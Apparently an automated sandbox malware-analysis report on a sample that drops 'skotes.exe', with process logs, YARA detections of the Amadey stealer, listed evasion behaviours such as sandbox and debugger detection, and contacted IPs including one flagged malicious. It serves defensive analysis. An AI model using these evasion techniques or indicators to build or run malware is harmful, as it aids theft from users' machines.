Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EDCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00EDCBEA

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 6.2.skotes.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.2080301971.0000000005470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041944426.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2082994524.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2672497504.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2123212600.0000000000EC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2120598365.0000000000EC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2082959480.0000000000311000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3282216194.0000000000EC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561683 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 70 youtube-ui.l.google.com 2->70 72 www.youtube.com 2->72 74 23 other IPs or domains 2->74 96 Multi AV Scanner detection for domain / URL 2->96 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 9 other signatures 2->102 9 file.exe 5 2->9         started        13 skotes.exe 2->13         started        15 skotes.exe 16 2->15         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 58 C:\Users\user\AppData\Local\...\skotes.exe, PE32 9->58 dropped 60 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 9->60 dropped 112 Detected unpacking (changes PE section rights) 9->112 114 Tries to evade debugger and weak emulator (self modifying code) 9->114 116 Tries to detect virtualization through RDTSC time measurements 9->116 20 skotes.exe 9->20         started        118 Multi AV Scanner detection for dropped file 13->118 120 Tries to detect sandboxes and other dynamic analysis tools (window names) 13->120 122 Hides threads from debuggers 13->122 90 185.215.113.43, 49812, 49820, 49829 WHOLESALECONNECTIONSNL Portugal 15->90 92 31.41.244.11, 49872, 80 AEROEXPRESS-ASRU Russian Federation 15->92 62 C:\Users\user\AppData\Local\...\KQGBYWk.ps1, ASCII 15->62 dropped 124 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->124 126 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->126 23 powershell.exe 26 15->23         started        94 192.168.2.5, 443, 49171, 49406 unknown unknown 18->94 25 firefox.exe 18->25         started        28 msedge.exe 18->28         started        30 msedge.exe 18->30         started        32 4 other processes 18->32 file6 signatures7 process8 dnsIp9 104 Hides threads from debuggers 20->104 106 Tries to detect sandboxes / dynamic malware analysis system (registry check) 20->106 108 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 20->108 110 Loading BitLocker PowerShell Module 23->110 34 chrome.exe 8 23->34         started        37 msedge.exe 10 23->37         started        39 conhost.exe 23->39         started        41 firefox.exe 1 23->41         started        78 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49967, 49984, 49995 GOOGLEUS United States 25->78 80 push.services.mozilla.com 34.107.243.93, 443, 50057 GOOGLEUS United States 25->80 86 7 other IPs or domains 25->86 43 firefox.exe 25->43         started        45 firefox.exe 25->45         started        47 firefox.exe 25->47         started        82 13.107.246.40, 443, 49976, 49977 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->82 84 23.96.180.189, 443, 50002 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->84 88 16 other IPs or domains 28->88 signatures10 process11 dnsIp12 76 239.255.255.250 unknown Reserved 34->76 49 chrome.exe 34->49         started        52 chrome.exe 34->52         started        54 chrome.exe 34->54         started        56 msedge.exe 37->56         started        process13 dnsIp14 64 youtube-ui.l.google.com 172.217.19.206, 443, 49890, 49965 GOOGLEUS United States 49->64 66 www3.l.google.com 49->66 68 3 other IPs or domains 49->68
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
172.217.19.206
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
13.107.246.40
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
23.96.180.189
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
142.250.80.110
 unknown United States
15169 GOOGLEUS false
152.195.19.97
 unknown United States
15133 EDGECASTUS false
172.253.63.84
 unknown United States
15169 GOOGLEUS false
172.217.19.225
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
142.250.64.78
 unknown United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
23.44.201.23
 unknown United States
20940 AKAMAI-ASN1EU false
172.64.41.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
34.120.208.123
 telemetry-incoming.r53-2.services.mozilla.com United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
94.245.104.56
 ssl.bingadsedgeextension-prod-europe.azurewebsites.net United Kingdom
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
34.149.100.209
 prod.remote-settings.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.107.243.93
 push.services.mozilla.com United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
142.251.40.163
 unknown United States
15169 GOOGLEUS false
142.250.72.99
 unknown United States
15169 GOOGLEUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
142.251.35.164
 unknown United States
15169 GOOGLEUS false

Private

IP
192.168.2.5
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
chrome.cloudflare-dns.com 172.64.41.3 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
youtube-ui.l.google.com 172.217.19.206 true
www3.l.google.com 172.217.19.238 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
play.google.com 172.217.19.238 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
www.google.com 142.250.181.100 true
googlehosted.l.googleusercontent.com 172.217.19.225 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
spocs.getpocket.com unknown unknown
clients2.googleusercontent.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
detectportal.firefox.com unknown unknown
bzib.nelreports.net unknown unknown
accounts.youtube.com unknown unknown
shavar.services.mozilla.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.google.com/favicon.ico false
    		high